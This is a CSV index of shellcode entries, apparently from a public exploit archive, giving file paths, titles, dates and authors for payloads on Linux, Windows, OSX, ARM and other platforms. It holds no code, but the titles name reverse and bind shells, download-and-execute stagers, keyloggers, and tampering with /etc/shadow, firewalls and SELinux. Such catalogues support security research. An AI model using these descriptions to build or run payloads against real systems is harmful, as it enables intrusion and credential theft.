35793,shellcodes/win_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,win_x86
|
||||||
|
35794,shellcodes/win_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,win_x86-64
|
||||||
|
35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
|
||||||
|
36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
|
||||||
|
36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
|
||||||
|
36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
|
||||||
|
36359,shellcodes/lin_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,lin_x86-64
|
||||||
|
36391,shellcodes/lin_x86/36391.c,"Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86
|
||||||
|
36393,shellcodes/lin_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86
|
||||||
|
36394,shellcodes/lin_x86/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86
|
||||||
|
36395,shellcodes/lin_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86
|
||||||
|
36397,shellcodes/lin_x86/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86
|
||||||
|
36398,shellcodes/lin_x86/36398.c,"Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86
|
||||||
|
36637,shellcodes/lin_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,lin_x86
|
||||||
|
36672,shellcodes/lin_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,lin_x86
|
||||||
|
36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator
|
||||||
|
36701,shellcodes/lin_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,lin_x86
|
||||||
|
36750,shellcodes/lin_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,lin_x86
|
||||||
|
36778,shellcodes/lin_x86/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,lin_x86
|
||||||
|
36779,shellcodes/win_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,win_x86
|
||||||
|
36780,shellcodes/win_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,win_x86
|
||||||
|
36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
|
||||||
|
36857,shellcodes/lin_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,lin_x86
|
||||||
|
36858,shellcodes/lin_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,lin_x86-64
|
||||||
|
36921,shellcodes/lin_x86/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,lin_x86
|
||||||
|
36908,shellcodes/lin_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,lin_x86
|
||||||
|
37069,shellcodes/lin_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,lin_x86
|
||||||
|
37251,shellcodes/lin_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,lin_x86
|
||||||
|
37285,shellcodes/lin_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,shellcode,lin_x86
|
||||||
|
37289,shellcodes/lin_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,lin_x86
|
||||||
|
37297,shellcodes/lin_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,lin_x86
|
||||||
|
37358,shellcodes/lin_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,lin_x86
|
||||||
|
37359,shellcodes/lin_x86/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,lin_x86
|
||||||
|
37362,shellcodes/lin_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,lin_x86-64
|
||||||
|
37365,shellcodes/lin_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,lin_x86
|
||||||
|
37366,shellcodes/lin_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,lin_x86
|
||||||
|
37384,shellcodes/lin_x86/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,lin_x86
|
||||||
|
37390,shellcodes/lin_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86
|
||||||
|
37391,shellcodes/lin_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86
|
||||||
|
37392,shellcodes/lin_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86
|
||||||
|
37393,shellcodes/lin_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86
|
||||||
|
37401,shellcodes/lin_x86-64/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,lin_x86-64
|
||||||
|
37495,shellcodes/lin_x86/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,lin_x86
|
||||||
|
37664,shellcodes/win_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,win_x86
|
||||||
|
37749,shellcodes/lin_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,lin_x86
|
||||||
|
37758,shellcodes/win_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,win_x86
|
||||||
|
37762,shellcodes/lin_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,lin_x86
|
||||||
|
37895,shellcodes/win_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,win_x86-64
|
||||||
|
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
|
||||||
|
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
|
||||||
|
38088,shellcodes/lin_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,lin_x86
|
||||||
|
38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
|
||||||
|
38116,shellcodes/lin_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,lin_x86
|
||||||
|
38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
|
||||||
|
38150,shellcodes/lin_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,lin_x86-64
|
||||||
|
38194,shellcodes/android/38194.c,"Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
|
||||||
|
38239,shellcodes/lin_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,lin_x86-64
|
||||||
|
38469,shellcodes/lin_x86-64/38469.c,"Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,lin_x86-64
|
||||||
|
38708,shellcodes/lin_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,lin_x86-64
|
||||||
|
38815,shellcodes/lin_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,lin_x86-64
|
||||||
|
38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
|
||||||
|
39149,shellcodes/lin_x86-64/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,lin_x86-64
|
||||||
|
39152,shellcodes/lin_x86-64/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,lin_x86-64
|
||||||
|
39160,shellcodes/lin_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,lin_x86
|
||||||
|
39185,shellcodes/lin_x86-64/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,lin_x86-64
|
||||||
|
39203,shellcodes/lin_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,lin_x86-64
|
||||||
|
39204,shellcodes/lin_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,lin_x86
|
||||||
|
39312,shellcodes/lin_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,lin_x86-64
|
||||||
|
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
|
||||||
|
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
|
||||||
|
39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
|
||||||
|
39383,shellcodes/lin_x86-64/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,lin_x86-64
|
||||||
|
39388,shellcodes/lin_x86-64/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,lin_x86-64
|
||||||
|
39389,shellcodes/lin_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,lin_x86
|
||||||
|
39390,shellcodes/lin_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,lin_x86-64
|
||||||
|
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
|
||||||
|
39519,shellcodes/win_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,win_x86
|
||||||
|
39578,shellcodes/lin_x86-64/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,lin_x86-64
|
||||||
|
39617,shellcodes/lin_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,lin_x86-64
|
||||||
|
39624,shellcodes/lin_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,lin_x86-64
|
||||||
|
39625,shellcodes/lin_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,lin_x86-64
|
||||||
|
39684,shellcodes/lin_x86-64/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,lin_x86-64
|
||||||
|
39700,shellcodes/lin_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,lin_x86-64
|
||||||
|
39718,shellcodes/lin_x86-64/39718.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,lin_x86-64
|
||||||
|
40094,shellcodes/win_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
39722,shellcodes/lin_x86/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,lin_x86
|
||||||
|
39723,shellcodes/lin_x86/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,lin_x86
|
||||||
|
39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
|
||||||
|
39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
|
||||||
|
39754,shellcodes/win_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,win_x86
|
||||||
|
39758,shellcodes/lin_x86-64/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64
|
||||||
|
39763,shellcodes/lin_x86-64/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64
|
||||||
|
39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
|
||||||
|
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
|
||||||
|
39847,shellcodes/lin_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64
|
||||||
|
39851,shellcodes/lin_x86/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,lin_x86
|
||||||
|
39869,shellcodes/lin_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64
|
||||||
|
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
|
||||||
|
39900,shellcodes/win_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
39901,shellcodes/lin_x86/39901.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,lin_x86
|
||||||
|
39914,shellcodes/win_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
|
||||||
|
40005,shellcodes/win_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
40026,shellcodes/lin_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,lin_x86
|
||||||
|
40029,shellcodes/lin_x86-64/40029.c,"Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64
|
||||||
|
40052,shellcodes/lin_x86-64/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,lin_x86-64
|
||||||
|
40056,shellcodes/lin_x86/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,lin_x86
|
||||||
|
40061,shellcodes/lin_x86-64/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,lin_x86-64
|
||||||
|
40075,shellcodes/lin_x86/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,lin_x86
|
||||||
|
40079,shellcodes/lin_x86-64/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,lin_x86-64
|
||||||
|
40110,shellcodes/lin_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,lin_x86
|
||||||
|
40122,shellcodes/lin_x86-64/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,lin_x86-64
|
||||||
|
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
|
||||||
|
40131,shellcodes/lin_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,shellcode,lin_x86
|
||||||
|
40139,shellcodes/lin_x86-64/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,lin_x86-64
|
||||||
|
40175,shellcodes/win_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
40179,shellcodes/lin_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,lin_x86
|
||||||
|
40222,shellcodes/lin_x86/40222.c,"Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,lin_x86
|
||||||
|
40223,shellcodes/lin_x86/40223.c,"Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,lin_x86
|
||||||
|
40245,shellcodes/win_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
40246,shellcodes/win_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
40259,shellcodes/win_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,win_x86
|
||||||
|
40549,shellcodes/win_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,win_x86-64
|
||||||
|
40560,shellcodes/win_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,win_x86
|
||||||
|
40781,shellcodes/win_x86-64/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,win_x86-64
|
||||||
|
40808,shellcodes/lin_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,lin_x86-64
|
||||||
|
40821,shellcodes/win_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,win_x86-64
|
||||||
|
40872,shellcodes/lin_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,lin_x86
|
||||||
|
40924,shellcodes/lin_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,lin_x86
|
||||||
|
40981,shellcodes/win_x86-64/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,win_x86-64
|
||||||
|
41072,shellcodes/win_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,win_x86-64
|
||||||
|
41089,shellcodes/lin_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,lin_x86-64
|
||||||
|
41128,shellcodes/lin_x86-64/41128.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,lin_x86-64
|
||||||
|
41174,shellcodes/lin_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,lin_x86-64
|
||||||
|
41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux
|
||||||
|
41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator
|
||||||
|
41282,shellcodes/lin_x86/41282.nasm,"Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,lin_x86
|
||||||
|
41375,shellcodes/linux/41375.c,"Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
|
||||||
|
41381,shellcodes/win_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,win_x86
|
||||||
|
41398,shellcodes/lin_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,lin_x86-64
|
||||||
|
41403,shellcodes/lin_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,lin_x86
|
||||||
|
41439,shellcodes/lin_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,lin_x86-64
|
||||||
|
41467,shellcodes/win_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,win_x86
|
||||||
|
41468,shellcodes/lin_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,lin_x86-64
|
||||||
|
41477,shellcodes/lin_x86-64/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,lin_x86-64
|
||||||
|
41481,shellcodes/win_x86/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",shellcode,win_x86
|
||||||
|
41498,shellcodes/lin_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,lin_x86-64
|
||||||
|
41503,shellcodes/lin_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,lin_x86-64
|
||||||
|
41509,shellcodes/lin_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64
|
||||||
|
41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64
|
||||||
|
